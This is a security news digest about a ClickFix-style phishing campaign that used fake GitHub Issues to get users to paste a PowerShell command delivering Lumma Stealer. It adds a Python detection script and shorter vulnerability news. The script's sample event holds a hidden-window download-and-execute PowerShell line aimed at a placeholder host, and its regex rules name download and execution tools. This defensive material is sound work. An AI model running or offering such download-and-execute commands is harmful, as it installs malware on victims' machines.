Large-scale phishing attack on GitHub users

After clicking a link to a third-party site that was no longer active, the user was prompted to “verify that you are not a robot.” Then came the attackers’ clever twist: to “verify,” the user was asked to open the Windows Run dialog with the Win+R key combination and paste a piece of code that had already been placed in the clipboard. This code opened a PowerShell console, then downloaded and executed the malicious file. If you think such a crude attack will surely not work on developers, there is at least one reason to remain wary of this kind of “manual malware.”

This is what the Issues looked like when the attackers filed them from disposable GitHub accounts:

At the moment, all such comments have been removed from the repositories. But filing a bug report triggered a completely legitimate notification from GitHub, like the one in the screenshot at the beginning of the article. A tech-savvy user is unlikely to fall for such a provocation and actually run incomprehensible code on their PC with their own hands. But do not forget that non-technical managers or even contractors may also be subscribed to a repository’s GitHub notifications, and the trick can work on them.

This is what the user “verification” looks like. If you look at the site’s source code, you can see how the script is copied to the clipboard:

The script downloads and runs the malware, and at this point the user has to confirm launching the unknown file once more:
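One defender-side check for the chain described above, a shell launched from the Run dialog whose command line both downloads and executes, as an added example that is not from the original article; the event fields, sample command lines, indicator weights and the example.invalid host are all constructed for illustration:

```python
import re

# Constructed process-creation events (not real telemetry): parent image,
# child image and the child's command line, as an EDR or Sysmon feed would give.
SAMPLE_EVENTS = [
    # ClickFix-style chain: text pasted into Win+R (hosted by explorer.exe)
    # starts PowerShell, which fetches a remote payload and executes it.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://example.invalid/a)"'},
    # Benign: a scheduled script started by the task scheduler service host.
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\backup.ps1"},
    # Benign: an admin opens an interactive console from the Run dialog.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell"},
]

RUN_DIALOG_PARENTS = {"explorer.exe"}          # Win+R is hosted by explorer.exe
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Each indicator adds a weight; "download" plus "execute" in one command line
# is the core of the chain the article describes, so they weigh the most.
INDICATORS = [
    (re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I), 2, "download"),
    (re.compile(r"\b(iex|invoke-expression|start-process)\b", re.I), 2, "execute"),
    (re.compile(r"-(w|win|windowstyle)\s+hidden\b", re.I), 1, "hidden-window"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I), 1, "encoded"),
    (re.compile(r"https?://", re.I), 1, "url"),
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (forward or back slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> tuple:
    """Return (score, reasons) for one process-creation event; non-shells score 0."""
    if basename(event["image"]) not in SHELLS:
        return 0, []
    score, reasons = 0, []
    if basename(event["parent"]) in RUN_DIALOG_PARENTS:
        score, reasons = score + 1, reasons + ["shell-from-run-dialog"]
    for pattern, weight, label in INDICATORS:
        if pattern.search(event["cmdline"]):
            score, reasons = score + weight, reasons + [label]
    return score, reasons

def flag_events(events, threshold: int = 4) -> list:
    """Return events whose score reaches the threshold, with score and reasons attached."""
    return [{**ev, "score": s, "reasons": r} for ev in events
            for s, r in [score_event(ev)] if s >= threshold]
```

The interactive console from Win+R scores only 1 and the scheduled script 0, so the download-and-execute event is the only one that crosses the threshold.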

According to BleepingComputer, the malware is the Lumma Stealer infostealer, which became widespread in 2023 (you can read more about it here). The attackers’ goal is to steal saved passwords and browser sessions. This local incident is a reason to once again discuss the “it won’t affect me” attitude. Firstly, there are many examples of even experienced users falling victim to such attacks. Secondly, as mentioned above, the attack can affect other employees of your organization. Thirdly, this is far from the only attack of this kind. Less than a month ago, an alternative tactic for attacks on GitHub was reported: links to malicious code were sent under the guise of patches to public repositories. That trick was, to put it mildly, even simpler: the victim was asked to download a password-protected archive, unpack it themselves and run the malicious program. Attackers are constantly testing new social engineering methods, sending messages by the tens and hundreds of thousands, reasonably expecting that sooner or later the next trick will work.

What else happened?

Kaspersky Lab specialists published three studies last week: an analysis of the activities of the Twelve group, a study of the Unicorn malware used to steal data, and an analysis of the SambaSpy remote access trojan that attacks users in France and Italy.

Critical vulnerabilities have been discovered in D-Link routers. One of them makes it possible to enable remote access over the Telnet protocol and log in with a built-in password. The affected devices are the COVR-X1870, DIR-X5460 and DIR-X4860.

Data belonging to users of the Temu marketplace is being sold on the black market. The company itself, however, denies that the data is genuine.

Researchers from BINARLY have released an addition to the PKfail study published in July (we wrote about it here). As a reminder, the study concerns the use of identical private keys in implementations of UEFI Secure Boot. These “test” keys were found in many motherboards, laptops and servers from various manufacturers, and at least one of the keys definitely became publicly available due to a supplier error. In the summer, BINARLY released a public service for checking UEFI firmware for such test keys, which in the worst case can be used to completely compromise the system. Of the more than 10 thousand firmware images submitted to the service, 8.5% contained embedded test keys. Some of the keys were previously unknown, which made it possible to expand the list of affected devices. Among them, for example, were the popular Odroid single-board computers, as well as the Beelink Mini 12 Pro and Minisforum HX99G mini-computers.

The latest release of the iOS 18 operating system closes 33 vulnerabilities. One of the bugs could in theory expose private data on a locked phone via Siri.
